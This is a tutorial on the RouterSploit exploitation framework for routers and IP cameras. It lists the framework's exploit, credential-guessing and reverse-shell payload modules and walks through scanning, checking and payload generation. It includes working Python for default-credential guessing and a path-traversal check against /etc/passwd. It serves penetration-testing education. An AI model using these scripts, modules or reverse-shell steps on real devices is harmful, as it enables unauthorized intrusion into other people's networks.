RouterSploit is an exploitation framework aimed at routers and other embedded devices (IP cameras, projectors and similar appliances). It is written in Python, uses a Metasploit-style console (use / set / show / check / run), and bundles a large collection of modules for scanning, exploiting and credential-guessing against such devices. Pentesters use it to verify whether a device is affected by a known, published weakness, not to discover new ones, and the simple command-line interface makes a first assessment of a target device quick.
The main features of RouterSploit are:
- Scanning: the scanners/* modules (most usefully scanners/autopwn) run the check() routine of every applicable exploit module, plus the default-credential checks, against one target and report which ones apply. This is a vulnerability check driven by the module database, not a general-purpose port scanner; use nmap for host and service discovery first.
- Exploitation: a large set of exploits/* modules for published router, camera and miscellaneous embedded-device vulnerabilities. Each module has a check step (non-destructive verification) and a run step (actual exploitation).
- Credential attacks: creds/* modules try vendor default credentials or wordlists against telnet, SSH, FTP, SNMP and HTTP logins, to assess whether authentication has been left at factory settings.
- Modular framework: every exploit, scanner, credential set, payload and encoder is a Python module with the same interface, so new modules can be added or existing ones extended without touching the core.
I. Installing on Kali
1.1 Installing RouterSploit
RouterSploit is not installed on Kali by default, but Kali packages it: typing routersploit in a terminal prompts you to install the package; answer "Y" and enter your Kali account password and the installation runs automatically.
Alternatively, clone the repository (the reverse-shell GitHub organisation was renamed threat9; the old URL redirects to the current repository):
git clone https://github.com/reverse-shell/routersploit
If starting the framework from the clone afterwards fails with an import error, the Python dependencies listed in the repository's requirements.txt are missing. The one most often reported is pycryptodome:
pip install pycryptodome
1.2 Starting RouterSploit
Type routersploit in a terminal to open the framework (for a git checkout, run rsf.py with python3 inside the cloned directory). You land at the rsf > prompt.
II. Main RouterSploit commands
2.1 Basic commands
1. help command
Shows the help text for the built-in commands.
set: sets an option of the currently selected module, e.g. set target 192.168.1.1 sets the target host. Option names are lowercase and module-specific (target, port, lhost, lport, ...) and show options lists them; RouterSploit does not use Metasploit's RHOST.
2. show command
info: basic information about the current module (name, description, authors, references).
options: the module's configurable options and their current values.
advanced: the module's advanced options.
devices: the devices the current module is known to affect.
all: every available module.
encoders: available encoders.
creds: the credential modules (default-credential and brute-force modules), not credentials that have been captured.
exploits: available exploit modules.
scanners: available scanner modules.
wordlists: available wordlist files.
Output of show all on a Kali install (every module, grouped by type: generic, payloads, scanners, encoders, creds, exploits):
generic/upnp/ssdp_msearch
generic/bluetooth/btle_write
generic/bluetooth/btle_scan
generic/bluetooth/btle_enumerate
payloads/x86/reverse_tcp
payloads/x86/bind_tcp
payloads/perl/reverse_tcp
payloads/perl/bind_tcp
payloads/armle/reverse_tcp
payloads/armle/bind_tcp
payloads/php/reverse_tcp
payloads/php/bind_tcp
payloads/mipsle/reverse_tcp
payloads/mipsle/bind_tcp
payloads/mipsbe/reverse_tcp
payloads/mipsbe/bind_tcp
payloads/x64/reverse_tcp
payloads/x64/bind_tcp
payloads/cmd/netcat_reverse_tcp
payloads/cmd/perl_reverse_tcp
payloads/cmd/perl_bind_tcp
payloads/cmd/awk_bind_udp
payloads/cmd/awk_bind_tcp
payloads/cmd/python_reverse_udp
payloads/cmd/netcat_bind_tcp
payloads/cmd/php_bind_tcp
payloads/cmd/python_bind_udp
payloads/cmd/python_bind_tcp
payloads/cmd/python_reverse_tcp
payloads/cmd/awk_reverse_tcp
payloads/cmd/php_reverse_tcp
payloads/cmd/bash_reverse_tcp
payloads/python/reverse_udp
payloads/python/bind_udp
payloads/python/reverse_tcp
payloads/python/bind_tcp
scanners/autopwn
scanners/routers/router_scan
scanners/misc/misc_scan
scanners/cameras/camera_scan
encoders/php/hex
encoders/php/base64
encoders/python/hex
encoders/python/base64
creds/routers/netsys/telnet_default_creds
creds/routers/netsys/ftp_default_creds
creds/routers/netsys/ssh_default_creds
creds/routers/netcore/telnet_default_creds
creds/routers/netcore/ftp_default_creds
creds/routers/netcore/ssh_default_creds
creds/routers/ipfire/telnet_default_creds
creds/routers/ipfire/ftp_default_creds
creds/routers/ipfire/ssh_default_creds
creds/routers/technicolor/telnet_default_creds
creds/routers/technicolor/ftp_default_creds
creds/routers/technicolor/ssh_default_creds
creds/routers/3com/telnet_default_creds
creds/routers/3com/ftp_default_creds
creds/routers/3com/ssh_default_creds
creds/routers/2wire/telnet_default_creds
creds/routers/2wire/ftp_default_creds
creds/routers/2wire/ssh_default_creds
creds/routers/thomson/telnet_default_creds
creds/routers/thomson/ftp_default_creds
creds/routers/thomson/ssh_default_creds
creds/routers/huawei/telnet_default_creds
creds/routers/huawei/ftp_default_creds
creds/routers/huawei/ssh_default_creds
creds/routers/zte/telnet_default_creds
creds/routers/zte/ftp_default_creds
creds/routers/zte/ssh_default_creds
creds/routers/fortinet/telnet_default_creds
creds/routers/fortinet/ftp_default_creds
creds/routers/fortinet/ssh_default_creds
creds/routers/juniper/telnet_default_creds
creds/routers/juniper/ftp_default_creds
creds/routers/juniper/ssh_default_creds
creds/routers/pfsense/webinterface_http_form_default_creds
creds/routers/pfsense/ssh_default_creds
creds/routers/zyxel/telnet_default_creds
creds/routers/zyxel/ftp_default_creds
creds/routers/zyxel/ssh_default_creds
creds/routers/cisco/telnet_default_creds
creds/routers/cisco/ftp_default_creds
creds/routers/cisco/ssh_default_creds
creds/routers/ubiquiti/telnet_default_creds
creds/routers/ubiquiti/ftp_default_creds
creds/routers/ubiquiti/ssh_default_creds
creds/routers/asus/telnet_default_creds
creds/routers/asus/ftp_default_creds
creds/routers/asus/ssh_default_creds
creds/routers/movistar/telnet_default_creds
creds/routers/movistar/ftp_default_creds
creds/routers/movistar/ssh_default_creds
creds/routers/asmax/telnet_default_creds
creds/routers/asmax/ftp_default_creds
creds/routers/asmax/webinterface_http_auth_default_creds
creds/routers/asmax/ssh_default_creds
creds/routers/bhu/telnet_default_creds
creds/routers/bhu/ftp_default_creds
creds/routers/bhu/ssh_default_creds
creds/routers/belkin/telnet_default_creds
creds/routers/belkin/ftp_default_creds
creds/routers/belkin/ssh_default_creds
creds/routers/dlink/telnet_default_creds
creds/routers/dlink/ftp_default_creds
creds/routers/dlink/ssh_default_creds
creds/routers/comtrend/telnet_default_creds
creds/routers/comtrend/ftp_default_creds
creds/routers/comtrend/ssh_default_creds
creds/routers/tplink/telnet_default_creds
creds/routers/tplink/ftp_default_creds
creds/routers/tplink/ssh_default_creds
creds/routers/billion/telnet_default_creds
creds/routers/billion/ftp_default_creds
creds/routers/billion/ssh_default_creds
creds/routers/netgear/telnet_default_creds
creds/routers/netgear/ftp_default_creds
creds/routers/netgear/ssh_default_creds
creds/routers/mikrotik/telnet_default_creds
creds/routers/mikrotik/api_ros_default_creds
creds/routers/mikrotik/ftp_default_creds
creds/routers/mikrotik/ssh_default_creds
creds/routers/linksys/telnet_default_creds
creds/routers/linksys/ftp_default_creds
creds/routers/linksys/ssh_default_creds
creds/generic/snmp_bruteforce
creds/generic/ftp_default
creds/generic/telnet_default
creds/generic/http_basic_digest_default
creds/generic/ssh_bruteforce
creds/generic/ssh_default
creds/generic/http_basic_digest_bruteforce
creds/generic/telnet_bruteforce
creds/generic/ftp_bruteforce
creds/cameras/iqinvision/telnet_default_creds
creds/cameras/iqinvision/ftp_default_creds
creds/cameras/iqinvision/ssh_default_creds
creds/cameras/axis/telnet_default_creds
creds/cameras/axis/ftp_default_creds
creds/cameras/axis/webinterface_http_auth_default_creds
creds/cameras/axis/ssh_default_creds
creds/cameras/samsung/telnet_default_creds
creds/cameras/samsung/ftp_default_creds
creds/cameras/samsung/ssh_default_creds
creds/cameras/vacron/telnet_default_creds
creds/cameras/vacron/ftp_default_creds
creds/cameras/vacron/ssh_default_creds
creds/cameras/basler/telnet_default_creds
creds/cameras/basler/webinterface_http_form_default_creds
creds/cameras/basler/ftp_default_creds
creds/cameras/basler/ssh_default_creds
creds/cameras/siemens/telnet_default_creds
creds/cameras/siemens/ftp_default_creds
creds/cameras/siemens/ssh_default_creds
creds/cameras/arecont/telnet_default_creds
creds/cameras/arecont/ftp_default_creds
creds/cameras/arecont/ssh_default_creds
creds/cameras/avtech/telnet_default_creds
creds/cameras/avtech/ftp_default_creds
creds/cameras/avtech/ssh_default_creds
creds/cameras/hikvision/telnet_default_creds
creds/cameras/hikvision/ftp_default_creds
creds/cameras/hikvision/ssh_default_creds
creds/cameras/geovision/telnet_default_creds
creds/cameras/geovision/ftp_default_creds
creds/cameras/geovision/ssh_default_creds
creds/cameras/cisco/telnet_default_creds
creds/cameras/cisco/ftp_default_creds
creds/cameras/cisco/ssh_default_creds
creds/cameras/stardot/telnet_default_creds
creds/cameras/stardot/ftp_default_creds
creds/cameras/stardot/ssh_default_creds
creds/cameras/speco/telnet_default_creds
creds/cameras/speco/ftp_default_creds
creds/cameras/speco/ssh_default_creds
creds/cameras/brickcom/telnet_default_creds
creds/cameras/brickcom/ftp_default_creds
creds/cameras/brickcom/webinterface_http_auth_default_creds
creds/cameras/brickcom/ssh_default_creds
creds/cameras/mobotix/telnet_default_creds
creds/cameras/mobotix/ftp_default_creds
creds/cameras/mobotix/ssh_default_creds
creds/cameras/acti/telnet_default_creds
creds/cameras/acti/webinterface_http_form_default_creds
creds/cameras/acti/ftp_default_creds
creds/cameras/acti/ssh_default_creds
creds/cameras/videoiq/telnet_default_creds
creds/cameras/videoiq/ftp_default_creds
creds/cameras/videoiq/ssh_default_creds
creds/cameras/dlink/telnet_default_creds
creds/cameras/dlink/ftp_default_creds
creds/cameras/dlink/ssh_default_creds
creds/cameras/jvc/telnet_default_creds
creds/cameras/jvc/ftp_default_creds
creds/cameras/jvc/ssh_default_creds
creds/cameras/avigilon/telnet_default_creds
creds/cameras/avigilon/ftp_default_creds
creds/cameras/avigilon/ssh_default_creds
creds/cameras/canon/telnet_default_creds
creds/cameras/canon/ftp_default_creds
creds/cameras/canon/webinterface_http_auth_default_creds
creds/cameras/canon/ssh_default_creds
creds/cameras/grandstream/telnet_default_creds
creds/cameras/grandstream/ftp_default_creds
creds/cameras/grandstream/ssh_default_creds
creds/cameras/sentry360/telnet_default_creds
creds/cameras/sentry360/ftp_default_creds
creds/cameras/sentry360/ssh_default_creds
creds/cameras/american_dynamics/telnet_default_creds
creds/cameras/american_dynamics/ftp_default_creds
creds/cameras/american_dynamics/ssh_default_creds
creds/cameras/honeywell/telnet_default_creds
creds/cameras/honeywell/ftp_default_creds
creds/cameras/honeywell/ssh_default_creds
exploits/routers/netsys/multi_rce
exploits/routers/netcore/udp_53413_rce
exploits/routers/ipfire/ipfire_proxy_rce
exploits/routers/ipfire/ipfire_oinkcode_rce
exploits/routers/ipfire/ipfire_shellshock
exploits/routers/technicolor/tc7200_password_disclosure_v2
exploits/routers/technicolor/tc7200_password_disclosure
exploits/routers/technicolor/tg784_authbypass
exploits/routers/technicolor/dwg855_authbypass
exploits/routers/multi/misfortune_cookie
exploits/routers/multi/rom0
exploits/routers/multi/tcp_32764_rce
exploits/routers/multi/tcp_32764_info_disclosure
exploits/routers/multi/gpon_home_gateway_rce
exploits/routers/3com/officeconnect_rce
exploits/routers/3com/ap8760_password_disclosure
exploits/routers/3com/imc_path_traversal
exploits/routers/3com/officeconnect_info_disclosure
exploits/routers/3com/imc_info_disclosure
exploits/routers/2wire/gateway_auth_bypass
exploits/routers/2wire/4011g_5012nv_path_traversal
exploits/routers/thomson/twg849_info_disclosure
exploits/routers/thomson/twg850_password_disclosure
exploits/routers/huawei/e5331_mifi_info_disclosure
exploits/routers/huawei/hg530_hg520b_password_disclosure
exploits/routers/huawei/hg866_password_change
exploits/routers/huawei/hg520_info_disclosure
exploits/routers/zte/f460_f660_backdoor
exploits/routers/zte/zxv10_rce
exploits/routers/zte/zxhn_h108n_wifi_password_disclosure
exploits/routers/fortinet/fortigate_os_backdoor
exploits/routers/zyxel/zywall_usg_extract_hashes
exploits/routers/zyxel/p660hn_t_v2_rce
exploits/routers/zyxel/d1000_rce
exploits/routers/zyxel/p660hn_t_v1_rce
exploits/routers/zyxel/d1000_wifi_password_disclosure
exploits/routers/cisco/ucm_info_disclosure
exploits/routers/cisco/firepower_management60_path_traversal
exploits/routers/cisco/ucs_manager_rce
exploits/routers/cisco/secure_acs_bypass
exploits/routers/cisco/dpc2420_info_disclosure
exploits/routers/cisco/unified_multi_path_traversal
exploits/routers/cisco/ios_http_authorization_bypass
exploits/routers/cisco/firepower_management60_rce
exploits/routers/cisco/catalyst_2960_rocem
exploits/routers/ubiquiti/airos_6_x
exploits/routers/asus/asuswrt_lan_rce
exploits/routers/asus/rt_n16_password_disclosure
exploits/routers/asus/infosvr_backdoor_rce
exploits/routers/movistar/adsl_router_bhs_rta_path_traversal
exploits/routers/asmax/ar_804_gu_rce
exploits/routers/asmax/ar_1004g_password_disclosure
exploits/routers/bhu/bhu_urouter_rce
exploits/routers/belkin/n150_path_traversal
exploits/routers/belkin/g_plus_info_disclosure
exploits/routers/belkin/g_n150_password_disclosure
exploits/routers/belkin/play_max_prce
exploits/routers/belkin/auth_bypass
exploits/routers/belkin/n750_rce
exploits/routers/dlink/multi_hedwig_cgi_exec
exploits/routers/dlink/dir_645_password_disclosure
exploits/routers/dlink/dwl_3200ap_password_disclosure
exploits/routers/dlink/dsl_2740r_dns_change
exploits/routers/dlink/dir_300_645_815_upnp_rce
exploits/routers/dlink/dcs_930l_auth_rce
exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
exploits/routers/dlink/dsl_2750b_rce
exploits/routers/dlink/multi_hnap_rce
exploits/routers/dlink/dwr_932_info_disclosure
exploits/routers/dlink/dvg_n5402sp_path_traversal
exploits/routers/dlink/dir_8xx_password_disclosure
exploits/routers/dlink/dwr_932b_backdoor
exploits/routers/dlink/dir_645_815_rce
exploits/routers/dlink/dsl_2640b_dns_change
exploits/routers/dlink/dsp_w110_rce
exploits/routers/dlink/dir_815_850l_rce
exploits/routers/dlink/dir_300_600_rce
exploits/routers/dlink/dir_300_320_600_615_info_disclosure
exploits/routers/dlink/dgs_1510_add_user
exploits/routers/dlink/dsl_2750b_info_disclosure
exploits/routers/dlink/dir_850l_creds_disclosure
exploits/routers/dlink/dir_825_path_traversal
exploits/routers/dlink/dir_300_320_615_auth_bypass
exploits/routers/dlink/dns_320l_327l_rce
exploits/routers/dlink/dsl_2730_2750_path_traversal
exploits/routers/comtrend/ct_5361t_password_disclosure
exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure
exploits/routers/tplink/wdr740nd_wdr740n_path_traversal
exploits/routers/tplink/wdr740nd_wdr740n_backdoor
exploits/routers/tplink/archer_c2_c20i_rce
exploits/routers/billion/billion_7700nr4_password_disclosure
exploits/routers/billion/billion_5200w_rce
exploits/routers/shuttle/915wm_dns_change
exploits/routers/netgear/jnr1010_path_traversal
exploits/routers/netgear/dgn2200_ping_cgi_rce
exploits/routers/netgear/multi_rce
exploits/routers/netgear/prosafe_rce
exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
exploits/routers/netgear/r7000_r6400_rce
exploits/routers/netgear/multi_password_disclosure-2017-5521
exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal
exploits/routers/netgear/n300_auth_bypass
exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
exploits/routers/mikrotik/routeros_jailbreak
exploits/routers/linksys/wrt100_110_rce
exploits/routers/linksys/smartwifi_password_disclosure
exploits/routers/linksys/eseries_themoon_rce
exploits/routers/linksys/1500_2500_rce
exploits/routers/linksys/wap54gv3_rce
exploits/generic/ssh_auth_keys
exploits/generic/heartbleed
exploits/generic/shellshock
exploits/misc/asus/b1m_projector_rce
exploits/misc/wepresent/wipg1000_rce
exploits/misc/miele/pg8528_path_traversal
exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal
exploits/cameras/multi/netwave_ip_camera_information_disclosure
exploits/cameras/multi/dvr_creds_disclosure
exploits/cameras/multi/P2P_wificam_credential_disclosure
exploits/cameras/multi/P2P_wificam_rce
exploits/cameras/siemens/cvms2025_credentials_disclosure
exploits/cameras/cisco/video_surv_path_traversal
exploits/cameras/jovision/jovision_credentials_disclosure
exploits/cameras/brickcom/users_cgi_creds_disclosure
exploits/cameras/brickcom/corp_network_cameras_conf_disclosure
exploits/cameras/mvpower/dvr_jaws_rce
exploits/cameras/dlink/dcs_930l_932l_auth_bypass
exploits/cameras/avigilon/videoiq_camera_path_traversal
exploits/cameras/xiongmai/uc_httpd_path_traversal
exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli
exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor
exploits/cameras/honeywell/hicc_1100pt_password_disclosure
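All the *_default_creds and http_basic_digest_* entries above come down to the same loop. The following is an added example, mine and not a RouterSploit module, showing that loop for HTTP Basic authentication: a constructed four-pair list, RFC 7617 header construction, a stop at the first accepted pair, and an abort when the device stops answering (often a sign of a lockout, a reboot or a crashed web server). fake_device is a constructed stand-in that decodes the header the way a real server would; urllib_sender does the same against a real URL. The credential list and the device behaviour are assumptions for illustration only.

```python
"""Default-credential check over HTTP Basic authentication.

Added example, not a RouterSploit module. Same shape as the creds/* modules:
walk a short list of vendor defaults, stop at the first accepted pair, and
give up when the device stops answering.
"""
import base64
from typing import Callable, Dict, List, Optional, Tuple

# Constructed list for illustration; the real modules ship vendor-specific lists.
DEFAULT_CREDS: List[Tuple[str, str]] = [
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", ""),          # empty password is a common factory default
    ("root", "root"),
]

# A sender performs one request with the given headers and returns the HTTP
# status, or None if no reply came back at all.
Sender = Callable[[Dict[str, str]], Optional[int]]


def basic_auth_header(user: str, password: str) -> str:
    """RFC 7617: 'Basic ' + base64(user ':' password)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def find_default_creds(send: Sender, creds=DEFAULT_CREDS, stop_on_error: bool = True):
    """Try each pair once. Returns ((user, password), attempts) or (None, attempts)."""
    attempts = 0
    for user, password in creds:
        attempts += 1
        status = send({"Authorization": basic_auth_header(user, password)})
        if status is None:
            print(f"[*] {user}:{password!r} no reply")
            if stop_on_error:            # lockout, reboot or dead web server
                return None, attempts
            continue
        if 200 <= status < 300:
            print(f"[+] {user}:{password!r} accepted")
            return (user, password), attempts
        print(f"[-] {user}:{password!r} rejected ({status})")
    return None, attempts


def fake_device(valid: Tuple[str, str] = ("admin", "password")) -> Sender:
    """Constructed device: decodes the header like a real server, accepts one pair."""
    def send(headers: Dict[str, str]) -> Optional[int]:
        auth = headers.get("Authorization", "")
        if not auth.startswith("Basic "):
            return 401
        try:
            user, _, password = base64.b64decode(auth[6:]).decode().partition(":")
        except Exception:
            return 400
        return 200 if (user, password) == valid else 401
    return send


def urllib_sender(url: str, timeout: float = 5.0) -> Sender:
    """Real sender for a device login URL you are authorized to test."""
    import urllib.error
    import urllib.request

    def send(headers: Dict[str, str]) -> Optional[int]:
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as r:
                return r.status
        except urllib.error.HTTPError as e:
            return e.code                 # 401/403: credentials rejected
        except (urllib.error.URLError, OSError):
            return None
    return send


if __name__ == "__main__":
    find_default_creds(fake_device())
```

Against a real device, keep the list short and the attempts sequential: embedded web servers are single-threaded and fragile, and a burst of failed logins can lock the management interface or reboot the device, which is exactly the "no reply" case the loop aborts on.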
3. run
Runs the currently selected module against the configured target: actual exploitation for an exploit module, the scan for a scanner module, and payload generation for a payload module.
4. use command
use <module>: selects the module to work with (exploit, scanner, creds or payload), e.g. use scanners/autopwn. Tab completion works on module paths.
5. Running a local command
exec <command>: runs the command on the local Kali machine, not on the target. RouterSploit hands the rest of the line to the local operating system shell, so this is simply a way to use other tools without leaving the rsf > prompt. The form exec run <command> seen in some articles is wrong: run is a separate rsf command, and the shell would look for a local program called run. Write the system command directly after exec:
(1) A system command
exec ifconfig
Shows the local network interfaces, i.e. the address you will later use as lhost for a reverse payload.
(2) Another tool
exec nmap -sP 192.168.0.1/24
Runs an nmap ping sweep from the Kali host to find live hosts in the subnet before choosing a target (-sP is the old spelling of -sn).
(3) A custom script
exec /path/to/custom_script.sh arg1 arg2
Runs a local shell script with the arguments arg1 and arg2. Commands are executed on the target device only through a working RCE exploit module and the shell it provides, never through exec.
6. search command
search <keyword>: lists the modules whose path contains the keyword, e.g. search dlink or search rce.
7. Quitting and going back
exit: quits RouterSploit.
back: deselects the current module and returns to the top-level rsf > prompt.
2.2 Symbols in scan output
RouterSploit prefixes its messages with three markers, [+], [-] and [*]. They are general status markers, not only scan verdicts:
[+] success or positive result: a check found the device vulnerable, or a credential pair was accepted.
[-] negative result or error: the check found the device not vulnerable, a credential pair was rejected, or the request itself failed.
[*] status message: progress information, and in autopwn the verdict "could not be verified". That verdict is what you get when a module's check() returns neither True nor False (None) because the reply was missing or inconclusive, so the module is neither confirmed nor ruled out. A [*] line is therefore not a negative; re-test such modules by hand with check and, where authorized, run.
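How autopwn arrives at those three lines, as an added example that is not RouterSploit code: two hypothetical checks follow the framework's tri-state check() contract (True, False or None), and a small autopwn-style runner turns the result into [+], [-] or [*]. The URL paths, the module names and the device behaviour are invented for illustration and do not correspond to any real device or module; fake_target stands in for the HTTP transport so the example runs offline, and urllib_transport is the real equivalent.

```python
"""Tri-state vulnerability checks and an autopwn-style runner.

Added example, not RouterSploit code. Mirrors the check() contract the
framework uses: True = vulnerable, False = not vulnerable, None = could not
be verified (no reply, unexpected reply, exception).
"""
from typing import Callable, Dict, Optional, Tuple

# A transport fetches one path and returns (status, body), or None if the
# request itself failed (timeout, connection refused).
Transport = Callable[[str], Optional[Tuple[int, str]]]


# Hypothetical check 1: directory traversal through a download CGI. The path
# is invented for illustration and does not belong to any real device.
def check_path_traversal(get: Transport) -> Optional[bool]:
    resp = get("/cgi-bin/download?file=../../../../etc/passwd")
    if resp is None:
        return None                      # no answer: cannot verify either way
    status, body = resp
    if status != 200:
        return False                     # the CGI refused or does not exist
    return "root:" in body and ":0:0:" in body   # real passwd content leaked


# Hypothetical check 2: configuration backup readable without authentication.
def check_unauth_config(get: Transport) -> Optional[bool]:
    resp = get("/config.bin")            # invented path
    if resp is None:
        return None
    status, body = resp
    return status == 200 and "password" in body.lower()


MODULES: Dict[str, Callable[[Transport], Optional[bool]]] = {
    "exploits/hypothetical/path_traversal": check_path_traversal,
    "exploits/hypothetical/config_disclosure": check_unauth_config,
}

MARK = {True: "[+]", False: "[-]", None: "[*]"}
VERDICT = {True: "is vulnerable", False: "is not vulnerable", None: "could not be verified"}


def autopwn(get: Transport, modules=MODULES) -> Dict[str, Optional[bool]]:
    """Run every module's check once and print one marker line per module."""
    results: Dict[str, Optional[bool]] = {}
    for name, check in modules.items():
        try:
            result = check(get)
        except Exception:                # a broken module must not abort the scan
            result = None
        results[name] = result
        print(f"{MARK[result]} {name} {VERDICT[result]}")
    return results


# Constructed fake device for offline use: leaks /etc/passwd through the
# traversal path and never answers /config.bin (simulated timeout).
def fake_target(path: str) -> Optional[Tuple[int, str]]:
    if "../" in path and path.endswith("etc/passwd"):
        return 200, "root:x:0:0:root:/root:/bin/sh\nadmin:x:1000:1000::/home/admin:/bin/sh\n"
    if path == "/config.bin":
        return None
    return 404, "Not Found"


def urllib_transport(host: str, port: int = 80, timeout: float = 5.0) -> Transport:
    """Real transport (plain HTTP GET); only use against devices you may test."""
    import urllib.error
    import urllib.request

    def get(path: str) -> Optional[Tuple[int, str]]:
        try:
            with urllib.request.urlopen(f"http://{host}:{port}{path}", timeout=timeout) as r:
                return r.status, r.read().decode(errors="replace")
        except urllib.error.HTTPError as e:          # 4xx/5xx still carry a status
            return e.code, e.read().decode(errors="replace")
        except (urllib.error.URLError, OSError):
            return None
    return get


if __name__ == "__main__":
    autopwn(fake_target)
```

The point of the None branch is operational: a timeout on one path says nothing about the vulnerability, and a scanner that reported it as [-] would hide exactly the modules worth retrying once the device has recovered.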
III. RouterSploit exploitation workflow
3.1 Scanning a router for vulnerabilities
1. Find the router's address
tracert is the Windows command; on Kali the equivalent is traceroute:
traceroute www.sina.com.cn
The first hop is the local router (the default gateway). ip route show default prints the same address without sending any traffic beyond the gateway.
3.2 Scan the router
use scanners/autopwn
show options
set target 192.168.1.1
run
The option is called target; show options lists it together with the per-service ports and the thread count. set RHOST, as in Metasploit, is not an option here and is rejected. autopwn then runs the check() of every exploit module and the default-credential checks and prints one [+]/[-]/[*] line per module.
3.3 Checking a single vulnerability
use exploits/routers/3com/officeconnect_rce
set target 192.168.31.1
check
check performs only the module's non-destructive verification and reports the target as vulnerable, not vulnerable, or not verifiable. Use show info and show devices first to see which models the module covers and the references for the underlying bug, so that a [-] on the wrong model is not mistaken for a clean result.
3.4 Exploitation
1. Payloads
The usable payloads are the payloads/... entries of the show all output in section 2.1: native payloads per architecture (x86, x64, armle, mipsle, mipsbe), interpreter payloads (perl, php, python) and command-line one-liners (payloads/cmd/*), each as a reverse_tcp or bind_tcp variant. Many articles obtain this list with show payloads; on Kali that command is not found at the rsf > prompt, and this is not a Python-version difference. In current RouterSploit, show payloads, set payload <name> and the lhost/lport settings are commands of the interactive cmd > shell that a successful run of an RCE exploit drops you into, and it is from there that a payload is uploaded to and executed on the target.
(1) Select the payload
use payloads/x64/reverse_tcp
(2) View its options
show options
(3) Set the callback address (and lport if you do not want the default port)
set lhost [your IP]
(4) Check the options again
show options
(5) Generate it
run
run in a payload module does not attack anything: it generates the payload for the chosen architecture with the given callback address (see the output-format options in show options) so that you can deliver it yourself. Before the payload executes on the target, a listener must already be waiting on lhost:lport (netcat, for example), otherwise the reverse connection has nothing to reach; with a bind_tcp payload you instead connect to the target after it runs. Match the architecture to the target: most SOHO routers are MIPS (mipsle/mipsbe) or ARM (armle), not x64, and the payloads/cmd/* one-liners only work if the interpreter they rely on (python, perl, php, bash, a netcat that supports -e) exists on the device, which on BusyBox-based firmware it often does not. A reverse shell appears only when the payload actually runs on a device with an exploitable vulnerability, i.e. through a successful exploit module, not from run in the payload module itself.